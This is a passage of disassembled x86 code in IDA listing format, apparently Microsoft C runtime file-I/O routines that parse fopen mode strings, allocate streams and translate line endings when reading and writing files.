jnz short loc_4219ED
int 3 ; Trap to Debugger
loc_4219ED: ; CODE XREF: sub_421980+4D�j
; sub_421980+6A�j
xor edx, edx
test edx, edx
jnz short loc_4219C9
loc_4219F3: ; CODE XREF: sub_421980+9B�j
cmp [ebp+arg_C], 0
jnz short loc_421A17
push offset aStrNull ; "str != NULL"
push 0
push 49h
push offset a_open_c ; "_open.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_421A17
int 3 ; Trap to Debugger
loc_421A17: ; CODE XREF: sub_421980+77�j
; sub_421980+94�j
xor eax, eax
test eax, eax
jnz short loc_4219F3
mov ecx, [ebp+arg_4]
mov dl, [ecx]
mov [ebp+var_20], dl
cmp [ebp+var_20], 61h
jz short loc_421A5C
cmp [ebp+var_20], 72h
jz short loc_421A39
cmp [ebp+var_20], 77h
jz short loc_421A4A
jmp short loc_421A6E
; ---------------------------------------------------------------------------
loc_421A39: ; CODE XREF: sub_421980+AF�j
mov [ebp+var_14], 0
mov eax, [ebp+var_1C]
or al, 1
mov [ebp+var_1C], eax
jmp short loc_421A75
; ---------------------------------------------------------------------------
loc_421A4A: ; CODE XREF: sub_421980+B5�j
mov [ebp+var_14], 301h
mov ecx, [ebp+var_1C]
or ecx, 2
mov [ebp+var_1C], ecx
jmp short loc_421A75
; ---------------------------------------------------------------------------
loc_421A5C: ; CODE XREF: sub_421980+A9�j
mov [ebp+var_14], 109h
mov edx, [ebp+var_1C]
or edx, 2
mov [ebp+var_1C], edx
jmp short loc_421A75
; ---------------------------------------------------------------------------
loc_421A6E: ; CODE XREF: sub_421980+B7�j
xor eax, eax
jmp loc_421C96
; ---------------------------------------------------------------------------
loc_421A75: ; CODE XREF: sub_421980+C8�j
; sub_421980+DA�j ...
mov [ebp+var_4], 1
loc_421A7C: ; CODE XREF: sub_421980:loc_421C1A�j
mov eax, [ebp+arg_4]
add eax, 1
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
movsx edx, byte ptr [ecx]
test edx, edx
jz loc_421C1F
cmp [ebp+var_4], 0
jz loc_421C1F
mov eax, [ebp+arg_4]
movsx ecx, byte ptr [eax]
mov [ebp+var_24], ecx
mov edx, [ebp+var_24]
sub edx, 2Bh
mov [ebp+var_24], edx
cmp [ebp+var_24], 49h
ja loc_421C13
mov ecx, [ebp+var_24]
xor eax, eax
mov al, ds:byte_421CC5[ecx]
jmp ds:off_421C9D[eax*4]
loc_421ACB: ; DATA XREF: .text:off_421C9D�o
mov edx, [ebp+var_14]
and edx, 2
test edx, edx
jz short loc_421ADE
mov [ebp+var_4], 0
jmp short loc_421B00
; ---------------------------------------------------------------------------
loc_421ADE: ; CODE XREF: sub_421980+153�j
mov eax, [ebp+var_14]
or al, 2
mov [ebp+var_14], eax
mov ecx, [ebp+var_14]
and ecx, 0FFFFFFFEh
mov [ebp+var_14], ecx
mov edx, [ebp+var_1C]
or dl, 80h
mov [ebp+var_1C], edx
mov eax, [ebp+var_1C]
and al, 0FCh
mov [ebp+var_1C], eax
loc_421B00: ; CODE XREF: sub_421980+15C�j
jmp loc_421C1A
; ---------------------------------------------------------------------------
loc_421B05: ; CODE XREF: sub_421980+144�j
; DATA XREF: .text:00421CB1�o
mov ecx, [ebp+var_14]
and ecx, 0C000h
test ecx, ecx
jz short loc_421B1B
mov [ebp+var_4], 0
jmp short loc_421B24
; ---------------------------------------------------------------------------
loc_421B1B: ; CODE XREF: sub_421980+190�j
mov edx, [ebp+var_14]
or dh, 80h
mov [ebp+var_14], edx
loc_421B24: ; CODE XREF: sub_421980+199�j
jmp loc_421C1A
; ---------------------------------------------------------------------------
loc_421B29: ; CODE XREF: sub_421980+144�j
; DATA XREF: .text:00421CBD�o
mov eax, [ebp+var_14]
and eax, 0C000h
test eax, eax
jz short loc_421B3E
mov [ebp+var_4], 0
jmp short loc_421B47
; ---------------------------------------------------------------------------
loc_421B3E: ; CODE XREF: sub_421980+1B3�j
mov ecx, [ebp+var_14]
or ch, 40h
mov [ebp+var_14], ecx
loc_421B47: ; CODE XREF: sub_421980+1BC�j
jmp loc_421C1A
; ---------------------------------------------------------------------------
loc_421B4C: ; CODE XREF: sub_421980+144�j
; DATA XREF: .text:00421CB5�o
cmp [ebp+var_18], 0
jz short loc_421B5B
mov [ebp+var_4], 0
jmp short loc_421B6B
; ---------------------------------------------------------------------------
loc_421B5B: ; CODE XREF: sub_421980+1D0�j
mov [ebp+var_18], 1
mov edx, [ebp+var_1C]
or dh, 40h
mov [ebp+var_1C], edx
loc_421B6B: ; CODE XREF: sub_421980+1D9�j
jmp loc_421C1A
; ---------------------------------------------------------------------------
loc_421B70: ; CODE XREF: sub_421980+144�j
; DATA XREF: .text:00421CB9�o
cmp [ebp+var_18], 0
jz short loc_421B7F
mov [ebp+var_4], 0
jmp short loc_421B8F
; ---------------------------------------------------------------------------
loc_421B7F: ; CODE XREF: sub_421980+1F4�j
mov [ebp+var_18], 1
mov eax, [ebp+var_1C]
and ah, 0BFh
mov [ebp+var_1C], eax
loc_421B8F: ; CODE XREF: sub_421980+1FD�j
jmp loc_421C1A
; ---------------------------------------------------------------------------
loc_421B94: ; CODE XREF: sub_421980+144�j
; DATA XREF: .text:00421CA9�o
cmp [ebp+var_10], 0
jz short loc_421BA3
mov [ebp+var_4], 0
jmp short loc_421BB3
; ---------------------------------------------------------------------------
loc_421BA3: ; CODE XREF: sub_421980+218�j
mov [ebp+var_10], 1
mov ecx, [ebp+var_14]
or ecx, 20h
mov [ebp+var_14], ecx
loc_421BB3: ; CODE XREF: sub_421980+221�j
jmp short loc_421C1A
; ---------------------------------------------------------------------------
loc_421BB5: ; CODE XREF: sub_421980+144�j
; DATA XREF: .text:00421CA5�o
cmp [ebp+var_10], 0
jz short loc_421BC4
mov [ebp+var_4], 0
jmp short loc_421BD4
; ---------------------------------------------------------------------------
loc_421BC4: ; CODE XREF: sub_421980+239�j
mov [ebp+var_10], 1
mov edx, [ebp+var_14]
or edx, 10h
mov [ebp+var_14], edx
loc_421BD4: ; CODE XREF: sub_421980+242�j
jmp short loc_421C1A
; ---------------------------------------------------------------------------
loc_421BD6: ; CODE XREF: sub_421980+144�j
; DATA XREF: .text:00421CAD�o
mov eax, [ebp+var_14]
and eax, 1000h
test eax, eax
jz short loc_421BEB
mov [ebp+var_4], 0
jmp short loc_421BF4
; ---------------------------------------------------------------------------
loc_421BEB: ; CODE XREF: sub_421980+260�j
mov ecx, [ebp+var_14]
or ch, 10h
mov [ebp+var_14], ecx
loc_421BF4: ; CODE XREF: sub_421980+269�j
jmp short loc_421C1A
; ---------------------------------------------------------------------------
loc_421BF6: ; CODE XREF: sub_421980+144�j
; DATA XREF: .text:00421CA1�o
mov edx, [ebp+var_14]
and edx, 40h
test edx, edx
jz short loc_421C09
mov [ebp+var_4], 0
jmp short loc_421C11
; ---------------------------------------------------------------------------
loc_421C09: ; CODE XREF: sub_421980+27E�j
mov eax, [ebp+var_14]
or al, 40h
mov [ebp+var_14], eax
loc_421C11: ; CODE XREF: sub_421980+287�j
jmp short loc_421C1A
; ---------------------------------------------------------------------------
loc_421C13: ; CODE XREF: sub_421980+133�j
; sub_421980+144�j
; DATA XREF: ...
mov [ebp+var_4], 0
loc_421C1A: ; CODE XREF: sub_421980:loc_421B00�j
; sub_421980:loc_421B24�j ...
jmp loc_421A7C
; ---------------------------------------------------------------------------
loc_421C1F: ; CODE XREF: sub_421980+10D�j
; sub_421980+117�j
push 1A4h
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+var_14]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_4282A0
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jge short loc_421C45
xor eax, eax
jmp short loc_421C96
; ---------------------------------------------------------------------------
loc_421C45: ; CODE XREF: sub_421980+2BF�j
mov ecx, dword_492154
add ecx, 1
mov dword_492154, ecx
mov edx, [ebp+arg_C]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
mov ecx, [ebp+var_1C]
mov [eax+0Ch], ecx
mov edx, [ebp+var_C]
mov dword ptr [edx+4], 0
mov eax, [ebp+var_C]
mov dword ptr [eax], 0
mov ecx, [ebp+var_C]
mov dword ptr [ecx+8], 0
mov edx, [ebp+var_C]
mov dword ptr [edx+1Ch], 0
mov eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [eax+10h], ecx
mov eax, [ebp+var_C]
loc_421C96: ; CODE XREF: sub_421980+F0�j
; sub_421980+2C3�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_421980 endp
; ---------------------------------------------------------------------------
off_421C9D dd offset loc_421ACB ; DATA XREF: sub_421980+144�r
dd offset loc_421BF6
dd offset loc_421BB5
dd offset loc_421B94
dd offset loc_421BD6
dd offset loc_421B05
dd offset loc_421B4C
dd offset loc_421B70
dd offset loc_421B29
dd offset loc_421C13
byte_421CC5 db 0 ; DATA XREF: sub_421980+13E�r
dw 909h
dd 5 dup(9090909h), 9010909h, 3 dup(9090909h), 9040302h
dd 3 dup(9090909h), 9090605h, 2 dup(9090909h), 9090907h
dd 0CC080909h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421D10 proc near ; CODE XREF: sub_419C70+B9�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], 0
push 2
call sub_41BC90
add esp, 4
mov [ebp+var_4], 0
jmp short loc_421D39
; ---------------------------------------------------------------------------
loc_421D30: ; CODE XREF: sub_421D10+A8�j
; sub_421D10:loc_421E39�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_421D39: ; CODE XREF: sub_421D10+1E�j
mov ecx, [ebp+var_4]
cmp ecx, dword_493760
jge loc_421E3E
mov edx, [ebp+var_4]
mov eax, dword_492750
cmp dword ptr [eax+edx*4], 0
jz short loc_421DCF
mov ecx, [ebp+var_4]
mov edx, dword_492750
mov eax, [edx+ecx*4]
mov ecx, [eax+0Ch]
and ecx, 83h
test ecx, ecx
jnz short loc_421DCD
mov edx, [ebp+var_4]
mov eax, dword_492750
mov ecx, [eax+edx*4]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_421270
add esp, 8
mov eax, [ebp+var_4]
mov ecx, dword_492750
mov edx, [ecx+eax*4]
mov eax, [edx+0Ch]
and eax, 83h
test eax, eax
jz short loc_421DBD
mov ecx, [ebp+var_4]
mov edx, dword_492750
mov eax, [edx+ecx*4]
push eax
mov ecx, [ebp+var_4]
push ecx
call sub_4212E0
add esp, 8
jmp loc_421D30
; ---------------------------------------------------------------------------
loc_421DBD: ; CODE XREF: sub_421D10+8D�j
mov edx, [ebp+var_4]
mov eax, dword_492750
mov ecx, [eax+edx*4]
mov [ebp+var_8], ecx
jmp short loc_421E3E
; ---------------------------------------------------------------------------
loc_421DCD: ; CODE XREF: sub_421D10+5D�j
jmp short loc_421E39
; ---------------------------------------------------------------------------
loc_421DCF: ; CODE XREF: sub_421D10+44�j
push 55h
push offset aStream_c ; "stream.c"
push 2
push 38h
call sub_416A30
add esp, 10h
mov edx, [ebp+var_4]
mov ecx, dword_492750
mov [ecx+edx*4], eax
mov edx, [ebp+var_4]
mov eax, dword_492750
cmp dword ptr [eax+edx*4], 0
jz short loc_421E37
mov ecx, [ebp+var_4]
mov edx, dword_492750
mov eax, [edx+ecx*4]
add eax, 20h
push eax
call ds:dword_494430
mov ecx, [ebp+var_4]
mov edx, dword_492750
mov eax, [edx+ecx*4]
add eax, 20h
push eax
call ds:dword_494304
mov ecx, [ebp+var_4]
mov edx, dword_492750
mov eax, [edx+ecx*4]
mov [ebp+var_8], eax
loc_421E37: ; CODE XREF: sub_421D10+EA�j
jmp short loc_421E3E
; ---------------------------------------------------------------------------
loc_421E39: ; CODE XREF: sub_421D10:loc_421DCD�j
jmp loc_421D30
; ---------------------------------------------------------------------------
loc_421E3E: ; CODE XREF: sub_421D10+32�j
; sub_421D10+BB�j ...
cmp [ebp+var_8], 0
jz short loc_421E7F
mov ecx, [ebp+var_8]
mov dword ptr [ecx+4], 0
mov edx, [ebp+var_8]
mov dword ptr [edx+0Ch], 0
mov eax, [ebp+var_8]
mov dword ptr [eax+8], 0
mov ecx, [ebp+var_8]
mov dword ptr [ecx], 0
mov edx, [ebp+var_8]
mov dword ptr [edx+1Ch], 0
mov eax, [ebp+var_8]
mov dword ptr [eax+10h], 0FFFFFFFFh
loc_421E7F: ; CODE XREF: sub_421D10+132�j
push 2
call sub_41BD30
add esp, 4
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_421D10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421E90 proc near ; CODE XREF: sub_419DD0+118�p
; sub_421790+CB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
cmp eax, dword_492520
jnb short loc_421EC1
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, dword_492420[ecx*4]
movsx ecx, byte ptr [eax+edx+4]
and ecx, 1
test ecx, ecx
jnz short loc_421EDC
loc_421EC1: ; CODE XREF: sub_421E90+D�j
call sub_422F20
mov dword ptr [eax], 9
call sub_422F30
mov dword ptr [eax], 0
or eax, 0FFFFFFFFh
jmp short loc_421F0E
; ---------------------------------------------------------------------------
loc_421EDC: ; CODE XREF: sub_421E90+2F�j
mov edx, [ebp+arg_0]
push edx
call sub_4280C0
add esp, 4
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_421F20
add esp, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push eax
call sub_428150
add esp, 4
mov eax, [ebp+var_4]
loc_421F0E: ; CODE XREF: sub_421E90+4A�j
mov esp, ebp
pop ebp
retn
sub_421E90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421F20 proc near ; CODE XREF: sub_421E90+64�p
; sub_4282A0+42F�p
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov [ebp+var_18], 0
mov eax, [ebp+arg_4]
mov [ebp+var_14], eax
cmp [ebp+arg_8], 0
jz short loc_421F5B
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, dword_492420[ecx*4]
movsx ecx, byte ptr [eax+edx+4]
and ecx, 2
test ecx, ecx
jz short loc_421F62
loc_421F5B: ; CODE XREF: sub_421F20+17�j
xor eax, eax
jmp loc_422361
; ---------------------------------------------------------------------------
loc_421F62: ; CODE XREF: sub_421F20+39�j
mov edx, [ebp+arg_0]
sar edx, 5
mov eax, [ebp+arg_0]
and eax, 1Fh
imul eax, 24h
mov ecx, dword_492420[edx*4]
movsx edx, byte ptr [ecx+eax+4]
and edx, 48h
test edx, edx
jz short loc_421FF9
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, dword_492420[eax*4]
movsx eax, byte ptr [edx+ecx+5]
cmp eax, 0Ah
jz short loc_421FF9
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, dword_492420[ecx*4]
mov ecx, [ebp+var_14]
mov dl, [eax+edx+5]
mov [ecx], dl
mov eax, [ebp+var_14]
add eax, 1
mov [ebp+var_14], eax
mov ecx, [ebp+var_18]
add ecx, 1
mov [ebp+var_18], ecx
mov edx, [ebp+arg_8]
sub edx, 1
mov [ebp+arg_8], edx
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, dword_492420[eax*4]
mov byte ptr [edx+ecx+5], 0Ah
loc_421FF9: ; CODE XREF: sub_421F20+62�j
; sub_421F20+82�j
push 0
lea eax, [ebp+var_10]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+var_14]
push edx
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, dword_492420[eax*4]
mov eax, [edx+ecx]
push eax
call ds:dword_4942DC
test eax, eax
jnz short loc_422078
call ds:dword_4942F0
mov [ebp+var_8], eax
cmp [ebp+var_8], 5
jnz short loc_422057
call sub_422F20
mov dword ptr [eax], 9
call sub_422F30
mov ecx, [ebp+var_8]
mov [eax], ecx
or eax, 0FFFFFFFFh
jmp loc_422361
; ---------------------------------------------------------------------------
loc_422057: ; CODE XREF: sub_421F20+118�j
cmp [ebp+var_8], 6Dh
jnz short loc_422064
xor eax, eax
jmp loc_422361
; ---------------------------------------------------------------------------
loc_422064: ; CODE XREF: sub_421F20+13B�j
mov edx, [ebp+var_8]
push edx
call sub_422E80
add esp, 4
or eax, 0FFFFFFFFh
jmp loc_422361
; ---------------------------------------------------------------------------
loc_422078: ; CODE XREF: sub_421F20+109�j
mov eax, [ebp+var_18]
add eax, [ebp+var_10]
mov [ebp+var_18], eax
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, dword_492420[ecx*4]
movsx ecx, byte ptr [eax+edx+4]
and ecx, 80h
test ecx, ecx
jz loc_42235E
cmp [ebp+var_10], 0
jz short loc_4220F4
mov edx, [ebp+arg_4]
movsx eax, byte ptr [edx]
cmp eax, 0Ah
jnz short loc_4220F4
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, dword_492420[ecx*4]
mov cl, [eax+edx+4]
or cl, 4
mov edx, [ebp+arg_0]
sar edx, 5
mov eax, [ebp+arg_0]
and eax, 1Fh
imul eax, 24h
mov edx, dword_492420[edx*4]
mov [edx+eax+4], cl
jmp short loc_42212A
; ---------------------------------------------------------------------------
loc_4220F4: ; CODE XREF: sub_421F20+18E�j
; sub_421F20+199�j
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, dword_492420[eax*4]
mov al, [edx+ecx+4]
and al, 0FBh
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov ecx, dword_492420[ecx*4]
mov [ecx+edx+4], al
loc_42212A: ; CODE XREF: sub_421F20+1D2�j
mov edx, [ebp+arg_4]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
mov [ebp+var_4], eax
loc_422136: ; CODE XREF: sub_421F20:loc_422350�j
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_18]
cmp [ebp+var_4], ecx
jnb loc_422355
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 1Ah
jnz short loc_4221AE
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, dword_492420[ecx*4]
movsx ecx, byte ptr [eax+edx+4]
and ecx, 40h
test ecx, ecx
jnz short loc_4221A9
mov edx, [ebp+arg_0]
sar edx, 5
mov eax, [ebp+arg_0]
and eax, 1Fh
imul eax, 24h
mov ecx, dword_492420[edx*4]
mov dl, [ecx+eax+4]
or dl, 2
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov eax, dword_492420[eax*4]
mov [eax+ecx+4], dl
loc_4221A9: ; CODE XREF: sub_421F20+250�j
jmp loc_422355
; ---------------------------------------------------------------------------
loc_4221AE: ; CODE XREF: sub_421F20+22E�j
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 0Dh
jz short loc_4221DA
mov eax, [ebp+var_C]
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
jmp loc_422350
; ---------------------------------------------------------------------------
loc_4221DA: ; CODE XREF: sub_421F20+297�j
mov edx, [ebp+var_18]
mov eax, [ebp+arg_4]
lea ecx, [eax+edx-1]
cmp [ebp+var_4], ecx
jnb short loc_422230
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx+1]
cmp eax, 0Ah
jnz short loc_42220F
mov ecx, [ebp+var_4]
add ecx, 2
mov [ebp+var_4], ecx
mov edx, [ebp+var_C]
mov byte ptr [edx], 0Ah
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
jmp short loc_42222B
; ---------------------------------------------------------------------------
loc_42220F: ; CODE XREF: sub_421F20+2D3�j
mov ecx, [ebp+var_C]
mov edx, [ebp+var_4]
mov al, [edx]
mov [ecx], al
mov ecx, [ebp+var_C]
add ecx, 1
mov [ebp+var_C], ecx
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_42222B: ; CODE XREF: sub_421F20+2ED�j
jmp loc_422350
; ---------------------------------------------------------------------------
loc_422230: ; CODE XREF: sub_421F20+2C7�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
mov [ebp+var_8], 0
push 0
lea ecx, [ebp+var_10]
push ecx
push 1
lea edx, [ebp+var_1C]
push edx
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, dword_492420[eax*4]
mov eax, [edx+ecx]
push eax
call ds:dword_4942DC
test eax, eax
jnz short loc_422279
call ds:dword_4942F0
mov [ebp+var_8], eax
loc_422279: ; CODE XREF: sub_421F20+34E�j
cmp [ebp+var_8], 0
jnz short loc_422285
cmp [ebp+var_10], 0
jnz short loc_422299
loc_422285: ; CODE XREF: sub_421F20+35D�j
mov ecx, [ebp+var_C]
mov byte ptr [ecx], 0Dh
mov edx, [ebp+var_C]
add edx, 1
mov [ebp+var_C], edx
jmp loc_422350
; ---------------------------------------------------------------------------
loc_422299: ; CODE XREF: sub_421F20+363�j
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, dword_492420[eax*4]
movsx eax, byte ptr [edx+ecx+4]
and eax, 48h
test eax, eax
jz short loc_422303
movsx ecx, [ebp+var_1C]
cmp ecx, 0Ah
jnz short loc_4222D5
mov edx, [ebp+var_C]
mov byte ptr [edx], 0Ah
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
jmp short loc_422301
; ---------------------------------------------------------------------------
loc_4222D5: ; CODE XREF: sub_421F20+3A2�j
mov ecx, [ebp+var_C]
mov byte ptr [ecx], 0Dh
mov edx, [ebp+var_C]
add edx, 1
mov [ebp+var_C], edx
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, dword_492420[eax*4]
mov al, [ebp+var_1C]
mov [edx+ecx+5], al
loc_422301: ; CODE XREF: sub_421F20+3B3�j
jmp short loc_422350
; ---------------------------------------------------------------------------
loc_422303: ; CODE XREF: sub_421F20+399�j
mov ecx, [ebp+var_C]
cmp ecx, [ebp+arg_4]
jnz short loc_422325
movsx edx, [ebp+var_1C]
cmp edx, 0Ah
jnz short loc_422325
mov eax, [ebp+var_C]
mov byte ptr [eax], 0Ah
mov ecx, [ebp+var_C]
add ecx, 1
mov [ebp+var_C], ecx
jmp short loc_422350
; ---------------------------------------------------------------------------
loc_422325: ; CODE XREF: sub_421F20+3E9�j
; sub_421F20+3F2�j
push 1
push 0FFFFFFFFh
mov edx, [ebp+arg_0]
push edx
call sub_424B90
add esp, 0Ch
mov [ebp+var_20], eax
movsx eax, [ebp+var_1C]
cmp eax, 0Ah
jz short loc_422350
mov ecx, [ebp+var_C]
mov byte ptr [ecx], 0Dh
mov edx, [ebp+var_C]
add edx, 1
mov [ebp+var_C], edx
loc_422350: ; CODE XREF: sub_421F20+2B5�j
; sub_421F20:loc_42222B�j ...
jmp loc_422136
; ---------------------------------------------------------------------------
loc_422355: ; CODE XREF: sub_421F20+21F�j
; sub_421F20:loc_4221A9�j
mov eax, [ebp+var_C]
sub eax, [ebp+arg_4]
mov [ebp+var_18], eax
loc_42235E: ; CODE XREF: sub_421F20+184�j
mov eax, [ebp+var_18]
loc_422361: ; CODE XREF: sub_421F20+3D�j
; sub_421F20+132�j ...
mov esp, ebp
pop ebp
retn
sub_421F20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422370 proc near ; CODE XREF: sub_41A0D0+147�p
; sub_41E810+1C9�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
cmp eax, dword_492520
jnb short loc_4223A1
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, dword_492420[ecx*4]
movsx ecx, byte ptr [eax+edx+4]
and ecx, 1
test ecx, ecx
jnz short loc_4223BC
loc_4223A1: ; CODE XREF: sub_422370+D�j
call sub_422F20
mov dword ptr [eax], 9
call sub_422F30
mov dword ptr [eax], 0
or eax, 0FFFFFFFFh
jmp short loc_4223EE
; ---------------------------------------------------------------------------
loc_4223BC: ; CODE XREF: sub_422370+2F�j
mov edx, [ebp+arg_0]
push edx
call sub_4280C0
add esp, 4
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_422400
add esp, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push eax
call sub_428150
add esp, 4
mov eax, [ebp+var_4]
loc_4223EE: ; CODE XREF: sub_422370+4A�j
mov esp, ebp
pop ebp
retn
sub_422370 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422400 proc near ; CODE XREF: sub_422370+64�p
; sub_42C610+145�p
var_420 = dword ptr -420h
var_41C = byte ptr -41Ch
var_418 = dword ptr -418h
var_414 = byte ptr -414h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 420h
mov [ebp+var_10], 0
mov eax, [ebp+var_10]
mov [ebp+var_420], eax
cmp [ebp+arg_8], 0
jnz short loc_422426
xor eax, eax
jmp loc_42266F
; ---------------------------------------------------------------------------
loc_422426: ; CODE XREF: sub_422400+1D�j
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, dword_492420[ecx*4]
movsx ecx, byte ptr [eax+edx+4]
and ecx, 20h
test ecx, ecx
jz short loc_422458
push 2
push 0
mov edx, [ebp+arg_0]
push edx
call sub_424B90
add esp, 0Ch
loc_422458: ; CODE XREF: sub_422400+46�j
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, dword_492420[eax*4]
movsx eax, byte ptr [edx+ecx+4]
and eax, 80h
test eax, eax
jz loc_42258C
mov ecx, [ebp+arg_4]
mov [ebp+var_4], ecx
mov [ebp+var_C], 0
loc_42248D: ; CODE XREF: sub_422400:loc_422585�j
mov edx, [ebp+var_4]
sub edx, [ebp+arg_4]
cmp edx, [ebp+arg_8]
jnb loc_42258A
lea eax, [ebp+var_414]
mov [ebp+var_8], eax
loc_4224A5: ; CODE XREF: sub_422400+115�j
mov ecx, [ebp+var_8]
lea edx, [ebp+var_414]
sub ecx, edx
cmp ecx, 400h
jge short loc_422517
mov eax, [ebp+var_4]
sub eax, [ebp+arg_4]
cmp eax, [ebp+arg_8]
jnb short loc_422517
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov [ebp+var_41C], dl
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
movsx ecx, [ebp+var_41C]
cmp ecx, 0Ah
jnz short loc_422501
mov edx, [ebp+var_420]
add edx, 1
mov [ebp+var_420], edx
mov eax, [ebp+var_8]
mov byte ptr [eax], 0Dh
mov ecx, [ebp+var_8]
add ecx, 1
mov [ebp+var_8], ecx
loc_422501: ; CODE XREF: sub_422400+E1�j
mov edx, [ebp+var_8]
mov al, [ebp+var_41C]
mov [edx], al
mov ecx, [ebp+var_8]
add ecx, 1
mov [ebp+var_8], ecx
jmp short loc_4224A5
; ---------------------------------------------------------------------------
loc_422517: ; CODE XREF: sub_422400+B6�j
; sub_422400+C1�j
push 0
lea edx, [ebp+var_418]
push edx
mov eax, [ebp+var_8]
lea ecx, [ebp+var_414]
sub eax, ecx
push eax
lea edx, [ebp+var_414]
push edx
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, dword_492420[eax*4]
mov eax, [edx+ecx]
push eax
call ds:dword_4942E4
test eax, eax
jz short loc_42257A
mov ecx, [ebp+var_10]
add ecx, [ebp+var_418]
mov [ebp+var_10], ecx
